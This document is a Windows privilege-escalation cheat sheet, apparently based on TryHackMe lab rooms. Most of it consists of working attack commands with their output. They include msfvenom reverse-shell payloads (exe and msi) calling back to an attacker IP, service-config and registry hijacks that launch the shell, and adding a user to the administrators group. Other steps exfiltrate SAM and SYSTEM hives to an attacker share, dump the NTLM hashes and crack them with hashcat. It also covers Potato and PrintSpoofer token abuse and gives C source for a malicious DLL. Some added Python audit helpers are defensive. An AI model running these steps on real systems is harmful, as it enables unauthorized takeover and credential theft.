Windows Privesc
Tools
Reverse shell
Using msfvenom :
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.9.52.128 LPORT=8888 -f exe -o revshell.exe
Using nishang.
Exploit suggester
Windows-Exploit-Suggester
$ git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester
$ cd Windows-Exploit-Suggester
$ python2 windows-exploit-suggester.py --update
$ # python2 -m pip install xlrd==1.1.0
$ python2 windows-exploit-suggester.py --database 2021-12-11-mssb.xls --ostext 'Windows 2012 R2 (6.3 Build 9600)'
or
$ python2 windows-exploit-suggester.py --database 2021-12-11-mssb.xls --systeminfo sysinfo_output.txt
WES-NG
$ python3 -m pip install wesng
$ wesng --update
PS> systeminfo > systeminfo.txt
$ wesng systeminfo.txt
Metasploit
Post exploitation module : multi/recon/local_exploit_suggester.
Services
Unquoted path
C:\Program.exe
C:\Program Files\Unquoted.exe
C:\Program Files\Unquoted Path Service\Common.exe
C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
C:\PrivEsc>sc qc unquotedsvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: unquotedsvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Unquoted Path Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# Check if we can write into the folder
C:\PrivEsc>accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"
C:\Program Files\Unquoted Path Service
Medium Mandatory Level (Default) [No-Write-Up]
RW BUILTIN\Users
RW NT SERVICE\TrustedInstaller
RW NT AUTHORITY\SYSTEM
RW BUILTIN\Administrators
# Copy reverse shell
C:\PrivEsc>copy C:\Users\user\revshell.exe "C:\Program Files\Unquoted Path Service\Common.exe"
1 file(s) copied.
C:\PrivEsc>net start unquotedsvc
...
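The list of candidate paths above is what CreateProcess tries for an unquoted service path, and the privesc only works when one of those candidates sits in a directory a low-privileged user can write to. The following Python is an added audit helper, not code from the original page or from the TryHackMe rooms it references: it parses a constructed copy of the `sc qc` output shown above, enumerates every space-delimited prefix (it also lists `C:\Program Files\Unquoted Path.exe`, which the short list above omits), and reports only the candidates whose directory is in a constructed set of writable directories (on a real host that set would come from accesschk -uwdq or icacls, as shown above).

```python
import ntpath
import re

# Constructed copy of the `sc qc unquotedsvc` output above, used as sample input.
SC_QC_OUTPUT = """\
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: unquotedsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\\Program Files\\Unquoted Path Service\\Common Files\\unquotedpathservice.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Unquoted Path Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

# Directories a low-privileged user can write to (constructed; on a real host
# this comes from accesschk -uwdq / icacls output, as shown above).
WRITABLE_DIRS = {r"C:\Program Files\Unquoted Path Service"}


def parse_sc_qc(output: str) -> dict:
    """Turn `sc qc` output into a FIELD -> value mapping."""
    config = {}
    for line in output.splitlines():
        m = re.match(r"\s*([A-Z_]+)\s*:\s*(.*?)\s*$", line)
        if m:
            config[m.group(1)] = m.group(2)
    return config


def create_process_candidates(image_path: str) -> list[str]:
    """Executables CreateProcess tries, in order, for an unquoted path with
    spaces: each space-delimited prefix with '.exe' appended, then the full
    path. A quoted path is unambiguous and yields itself only."""
    if image_path.startswith('"'):
        return [image_path.strip('"')]
    parts = image_path.split(" ")
    candidates = [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]
    candidates.append(image_path)
    return candidates


def writable_hijack_points(image_path: str, writable_dirs: set[str]) -> list[str]:
    """Candidates (other than the real binary) whose directory is writable,
    i.e. where a planted file would be started instead of the real service."""
    real = image_path.strip('"')
    return [c for c in create_process_candidates(image_path)
            if c != real and ntpath.dirname(c) in writable_dirs]


def audit_service(sc_qc_output: str, writable_dirs: set[str]) -> dict:
    """Flag a service whose BINARY_PATH_NAME is unquoted, contains spaces and
    has a writable directory on the CreateProcess lookup path."""
    cfg = parse_sc_qc(sc_qc_output)
    path = cfg["BINARY_PATH_NAME"]
    unquoted = not path.startswith('"') and " " in path
    return {
        "service": cfg["SERVICE_NAME"],
        "runs_as": cfg["SERVICE_START_NAME"],
        "unquoted": unquoted,
        "hijack_points": writable_hijack_points(path, writable_dirs) if unquoted else [],
    }


if __name__ == "__main__":
    # Prints the one writable hijack point for the sample: ...\Unquoted Path Service\Common.exe
    print(audit_service(SC_QC_OUTPUT, WRITABLE_DIRS))
```

The fix on the host side is the same in every case: quote the path (`sc config <svc> binpath= "\"C:\...\"`) and remove write access for BUILTIN\Users on the service's directory tree.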
Insecure service permissions
List permissions using sc :
C:\> sc sdshow <service>
D:(A;;CCLCSWLORC;;;**AU**)(A;;CCLCSWRPDTLOCRRCWDWO;;;**BA**)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;**SY**)(A;;CCLCSWLORC;;;**BU**)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;**WD**)
More information about security descriptors.
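Reading `sc sdshow` output by hand is error-prone, and the accesschk listing further down is just this string decoded. The Python below is an added example, not part of the original page: it decodes the DACL portion of an SDDL string into per-trustee service rights (the two-letter SDDL codes map onto the SERVICE_* access bits) and reports any trustee other than Administrators/SYSTEM that holds a right allowing the service to be reconfigured or taken over (SERVICE_CHANGE_CONFIG, WRITE_DAC, WRITE_OWNER, or a generic write/all). The first sample string is the descriptor shown above with the emphasis markers removed; the second is a constructed weak one.

```python
import re

# SDDL right abbreviations and what those bits mean on a service object.
SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS", "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START", "WP": "SERVICE_STOP",
    "DT": "SERVICE_PAUSE_CONTINUE", "LO": "SERVICE_INTERROGATE",
    "CR": "SERVICE_USER_DEFINED_CONTROL", "SD": "DELETE",
    "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
    "GA": "GENERIC_ALL", "GW": "GENERIC_WRITE", "GR": "GENERIC_READ",
    "GX": "GENERIC_EXECUTE",
}

# Well-known SID abbreviations that show up in service descriptors.
TRUSTEES = {
    "AU": "Authenticated Users", "BA": "BUILTIN\\Administrators",
    "BU": "BUILTIN\\Users", "SY": "NT AUTHORITY\\SYSTEM",
    "WD": "Everyone", "IU": "NT AUTHORITY\\INTERACTIVE",
}

# Rights that let a trustee change what the service runs or who controls it.
DANGEROUS = {"SERVICE_CHANGE_CONFIG", "WRITE_DAC", "WRITE_OWNER",
             "GENERIC_ALL", "GENERIC_WRITE"}
HIGH_PRIV = {"BA", "SY"}

# The descriptor shown above (emphasis removed): a default, sane one.
SANE_SDDL = ("D:(A;;CCLCSWLORC;;;AU)(A;;CCLCSWRPDTLOCRRCWDWO;;;BA)"
             "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)(A;;CCLCSWLORC;;;BU)"
             "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
# Constructed weak descriptor: Authenticated Users get full control.
WEAK_SDDL = "D:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)"


def parse_sddl_dacl(sddl: str) -> list[dict]:
    """Decode the `D:` (DACL) section of an SDDL string into a list of ACEs.
    The `S:` (SACL) section, if present, is ignored."""
    m = re.search(r"D:[A-Z]*((?:\([^)]*\))*)", sddl)
    if not m:
        return []
    aces = []
    for ace in re.findall(r"\(([^)]*)\)", m.group(1)):
        ace_type, _flags, rights, _obj, _inh, sid = ace.split(";")
        if rights.startswith("0x"):
            # Raw access mask; left undecoded here.
            names = {"0x%08x" % int(rights, 16)}
        else:
            names = {SERVICE_RIGHTS.get(rights[i:i + 2], rights[i:i + 2])
                     for i in range(0, len(rights), 2)}
        aces.append({"type": ace_type, "trustee": sid,
                     "name": TRUSTEES.get(sid, sid), "rights": names})
    return aces


def risky_grants(sddl: str) -> list[tuple[str, list[str]]]:
    """Allow ACEs for trustees other than Administrators/SYSTEM that carry a
    right from DANGEROUS. Empty list means nobody unprivileged can hijack it."""
    findings = []
    for ace in parse_sddl_dacl(sddl):
        if ace["type"] != "A" or ace["trustee"] in HIGH_PRIV:
            continue
        bad = sorted(ace["rights"] & DANGEROUS)
        if bad:
            findings.append((ace["name"], bad))
    return findings


if __name__ == "__main__":
    for label, sddl in (("sane", SANE_SDDL), ("weak", WEAK_SDDL)):
        print(label, risky_grants(sddl))
```

Only abbreviated SIDs are recognised as high-privilege; a literal `S-1-5-...` SID is reported by its string, so domain groups need a lookup before they can be whitelisted.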
List permissions of a user using accesschk.exe :
C:\> accesschk.exe /accepteula -wuvc <service>
C:\> accesschk.exe /accepteula -wuvc daclsvc
RW daclsvc
SERVICE_QUERY_STATUS
SERVICE_QUERY_CONFIG
SERVICE_CHANGE_CONFIG
SERVICE_INTERROGATE
SERVICE_ENUMERATE_DEPENDENTS
SERVICE_START
SERVICE_STOP
READ_CONTROL
SERVICE_CHANGE_CONFIG : Change the service configuration.
# Check the service 'daclsvc' configuration (qc : query configuration)
C:\PrivEsc>sc qc daclsvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: daclsvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files\DACL Service\daclservice.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : DACL Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# Change the binpath value
C:\PrivEsc>sc config daclsvc binpath="\"C:\Users\user\revshell.exe\""
[SC] ChangeServiceConfig SUCCESS
C:\PrivEsc>sc qc daclsvc
[...]
BINARY_PATH_NAME : "C:\Users\user\revshell.exe"
[...]
# Start the service 'daclsvc'
C:\PrivEsc>net start daclsvc
Faster way :
C:\> sc config daclsvc binpath= "net localgroup administrators user /add"
C:\> sc start daclsvc
# Then
C:\> net localgroup administrators
Insecure registry permissions
Add registry keys :
C:\PrivEsc>sc qc regsvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: regsvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files\Insecure Registry Service\insecureregistryservice.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Insecure Registry Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# regsvc service is writable by the "NT AUTHORITY\INTERACTIVE" group (essentially all logged-on users)
C:\PrivEsc>accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
HKLM\System\CurrentControlSet\Services\regsvc
Medium Mandatory Level (Default) [No-Write-Up]
RW NT AUTHORITY\SYSTEM
KEY_ALL_ACCESS
RW BUILTIN\Administrators
KEY_ALL_ACCESS
RW NT AUTHORITY\INTERACTIVE
KEY_ALL_ACCESS
# Add registry key to execute reverse shell
C:\PrivEsc>reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\Users\User\revshell.exe /f
The operation completed successfully.
C:\PrivEsc>net start regsvc
...
Insecure file permissions
Service binary file is writable by everyone (BUILTIN\Users) :
C:\PrivEsc>sc qc filepermsvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: filepermsvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files\File Permissions Service\filepermservice.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : File Permissions Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\PrivEsc>accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"
C:\Program Files\File Permissions Service\filepermservice.exe
Medium Mandatory Level (Default) [No-Write-Up]
RW Everyone
FILE_ALL_ACCESS
RW NT AUTHORITY\SYSTEM
FILE_ALL_ACCESS
RW BUILTIN\Administrators
FILE_ALL_ACCESS
RW WIN-QBA94KB3IOF\Administrator
FILE_ALL_ACCESS
RW BUILTIN\Users
FILE_ALL_ACCESS
# Replace service binary file by a reverse shell
C:\PrivEsc>copy C:\Users\user\revshell.exe "C:\Program Files\File Permissions Service\filepermservice.exe"
Overwrite C:\Program Files\File Permissions Service\filepermservice.exe? (Yes/No/All): Yes
Yes
1 file(s) copied.
C:\PrivEsc>net start filepermsvc
...
Autoruns
List autoruns :
C:\Users\user>wmic startup get caption,command
Caption Command
SecurityHealth %windir%\system32\SecurityHealthSystray.exe
My Program "C:\Program Files\Autorun Program\program.exe"
If you can overwrite C:\Program Files\Autorun Program\program.exe, you can replace it by your reverse shell and wait for the administrator to log in.
AlwaysInstallElevated
You can use the AlwaysInstallElevated policy to install a Windows Installer package with elevated (system) privileges (docs : link).
To install a package with elevated (system) privileges, set the AlwaysInstallElevated value to "1" under both of the following registry keys:
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
C:\Users\user>reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1
C:\Users\user>reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1
Exploitation :
# Attacker host
$ msfvenom -p windows/x64/shell_reverse_tcp \
LHOST=10.9.52.138 LPORT=9000 -f msi -o reverse_installer.msi
# Victim host
c:\Users\user>msiexec /qn /i "C:\Users\user\reverse_installer.msi"
Application running as admin
PS C:\Users\user> tasklist /V | findstr paint
mspaint.exe 4352 RDP-Tcp#0 2 61,256 K Running WIN-QBA94KB3IOF\admin 0:00:10 Untitled - Paint
Open file://c:/windows/system32/cmd.exe in the MS Paint "open file" dialog.
Saved credentials
PS C:\Users\user> cmdkey /list
Currently stored credentials:
Target: WindowsLive:target=virtualapp/didlogical
Type: Generic
User: 02nfpgrklkitqatu
Local machine persistence
Target: Domain:interactive=WIN-QBA94KB3IOF\admin
Type: Domain Password
User: WIN-QBA94KB3IOF\admin
PS C:\Users\user> runas /savecred /user:admin cmd.exe
Attempting to start cmd.exe as user "WIN-QBA94KB3IOF\admin" ...
Security Account Manager (SAM)
PS C:\Users\user> copy C:\Windows\Repair\SAM \\10.9.52.138\tmpshare
PS C:\Users\user> copy C:\Windows\Repair\SYSTEM \\10.9.52.138\tmpshare
Then :
$ git clone https://github.com/Tib3rius/creddump7
Cloning into 'creddump7'...
[...]
$ python3 creddump7/pwdump.py SYSTEM SAM
Administrator:500:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6ebaa6d5e6e601996eefe4b6048834c2:::
user:1000:aad3b435b51404eeaad3b435b51404ee:91ef1073f6ae95f5ea6ace91c09a963a:::
admin:1001:aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da:::
$ hashcat -m 1000 <hash> /usr/share/wordlists/rockyou.txt
[...]
Scheduled Tasks
Writable scripts
Startup apps
Folder "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp".
If writable, you can add your reverse shell EXE file. Then, wait for a higher privilege user to log on.
Privileges
- SeImpersonatePrivilege
- SeAssignPrimaryTokenPrivilege
- SeTcbPrivilege
- SeBackupPrivilege
- SeRestorePrivilege
- SeCreateTokenPrivilege
- SeLoadDriverPrivilege
- SeTakeOwnershipPrivilege
- SeDebugPrivilege
Docs : Access Tokens
Two types of access tokens:
- Primary access tokens : those associated with a user account that are generated on log on.
- Impersonation tokens : Allow a particular process (or thread in a process) to gain access to resources using the token of another (user/client) process.
Potato exploit (Rogue potato, Juicy potato, ...)
Rogue Potato :
- >= Windows 10 1809
- >= Windows Server 2019
Juicy Potato :
- < Windows 10 1809
- < Windows Server 2019
Privileges : SeAssignPrimaryTokenPrivilege or SeImpersonatePrivilege
Command to check privileges : whoami /priv
Exploitation :
Redirect attacker:135 to victim:9999 :
sudo socat tcp-listen:135,reuseaddr,fork tcp:10.10.13.238:9999
Exploit Rogue potato :
.\RoguePotato.exe -r <attacker_ip> -e "C:\path\reverse.exe" -l 9999
PrintSpoofer
Privileges : SeAssignPrimaryTokenPrivilege or SeImpersonatePrivilege
.\PrintSpoofer.exe -c "C:\Windows\System32\cmd.exe" -i
Tater (powershell implementation)
- Tater on Github.
C:\> powershell.exe -nop -ep bypass
PS C:\> Import-Module C:\Users\User\Desktop\Tools\Tater\Tater.ps1
PS C:\> Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"
# Check
PS C:\> net localgroup administrators
DLL Hijacking
- https://docs.microsoft.com/en-us/sysinternals/downloads/procmon
DLL hijacking requires an application (typically an exe file) that either has a missing DLL file, or where the search order can be used to insert the malicious DLL file.
In summary, for standard desktop applications, Windows follows one of the orders listed below depending on whether SafeDllSearchMode is enabled.
If SafeDllSearchMode is enabled, the search order is as follows:
- The directory from which the application loaded.
- The system directory. Use the GetSystemDirectory function to get the path of this directory.
- The 16-bit system directory. There is no function that obtains the path of this directory, but it is searched.
- The Windows directory. Use the GetWindowsDirectory function to get the path of this directory.
- The current directory.
- The directories that are listed in the PATH environment variable. Note that this does not include the per-application path specified by the App Paths registry key. The App Paths key is not used when computing the DLL search path.
If SafeDllSearchMode is disabled, the search order is as follows:
- The directory from which the application loaded.
- The current directory.
- The system directory. Use the GetSystemDirectory function to get the path of this directory.
- The 16-bit system directory. There is no function that obtains the path of this directory, but it is searched.
- The Windows directory. Use the GetWindowsDirectory function to get the path of this directory.
- The directories that are listed in the PATH environment variable. Note that this does not include the per-application path specified by the App Paths registry key. The App Paths key is not used when computing the DLL search path.
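The two lists only differ in where the current directory sits, and that single move is what SafeDllSearchMode buys you. The Python below is an added example (not code from the original page or the referenced rooms) that models both orders over a constructed host layout and, for a given DLL name, reports which writable directories are searched before the one holding the legitimate copy; a missing DLL (no legitimate copy) makes every writable directory on the order a finding. The directory names, the PATH entries and the writable set are all constructed assumptions; KnownDLLs, manifests and SetDllDirectory/LOAD_LIBRARY_SEARCH_* flags are deliberately not modelled.

```python
import ntpath

# Constructed layout of a host (not taken from the page).
APP_DIR = r"C:\Program Files\DLL Hijack Service"   # directory of the service exe
CWD = r"C:\Users\user"                              # current directory of the process
SYSTEM_DIR = r"C:\Windows\System32"
WINDOWS_DIR = r"C:\Windows"
PATH_DIRS = [r"C:\Windows\System32", r"C:\Temp"]
# Directories a standard user can write to (constructed; from accesschk/icacls on a real host).
WRITABLE_DIRS = {r"C:\Users\user", r"C:\Temp"}


def dll_search_order(app_dir, cwd, system_dir, windows_dir, path_dirs,
                     safe_dll_search_mode=True):
    """Directory order used to resolve a DLL loaded by bare name, mirroring
    the two lists above. The 16-bit system directory is <windows>\\System."""
    sixteen_bit = ntpath.join(windows_dir, "System")
    if safe_dll_search_mode:
        order = [app_dir, system_dir, sixteen_bit, windows_dir, cwd]
    else:
        order = [app_dir, cwd, system_dir, sixteen_bit, windows_dir]
    return order + list(path_dirs)


def hijack_opportunities(dll_name, order, writable_dirs, real_location=None):
    """Writable directories that are searched before `real_location` (the
    directory holding the legitimate DLL). real_location=None means the DLL
    does not exist anywhere, so every writable directory in the order counts.
    An empty result means a planted file cannot redirect this load."""
    found = []
    for d in order:
        if real_location is not None and ntpath.normcase(d) == ntpath.normcase(real_location):
            break
        if d in writable_dirs:
            found.append(ntpath.join(d, dll_name))
    return found


if __name__ == "__main__":
    safe = dll_search_order(APP_DIR, CWD, SYSTEM_DIR, WINDOWS_DIR, PATH_DIRS, True)
    unsafe = dll_search_order(APP_DIR, CWD, SYSTEM_DIR, WINDOWS_DIR, PATH_DIRS, False)
    # A DLL that lives in System32: safe mode finds it before the writable cwd.
    print("safe  :", hijack_opportunities("version.dll", safe, WRITABLE_DIRS, SYSTEM_DIR))
    print("unsafe:", hijack_opportunities("version.dll", unsafe, WRITABLE_DIRS, SYSTEM_DIR))
    # A DLL the application asks for but which is absent from the system.
    print("missing:", hijack_opportunities("hijackme.dll", safe, WRITABLE_DIRS))
```

On a real host the same three inputs (application directory, writable directories, where the DLL actually resides) are what Procmon's NAME NOT FOUND events for `.dll` paths give you; the model just makes explicit why a missing DLL plus a writable PATH entry is the common case.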
Malicious DLL :
#include <windows.h>
#include <stdlib.h>

/* Runs when the DLL is mapped into the host process (DLL_PROCESS_ATTACH):
   records the identity the process runs as, then terminates the host. */
BOOL WINAPI DllMain(HINSTANCE hDll, DWORD dwReason, LPVOID lpReserved) {
    if (dwReason == DLL_PROCESS_ATTACH) {
        system("cmd.exe /k whoami > C:\\Temp\\dll.txt");
        ExitProcess(0);
    }
    return TRUE;
}
Compilation using the mingw compiler (apt install gcc-mingw-w64-x86-64) :
$ x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
References
- https://tryhackme.com/room/windows10privesc
- https://tryhackme.com/room/winprivesc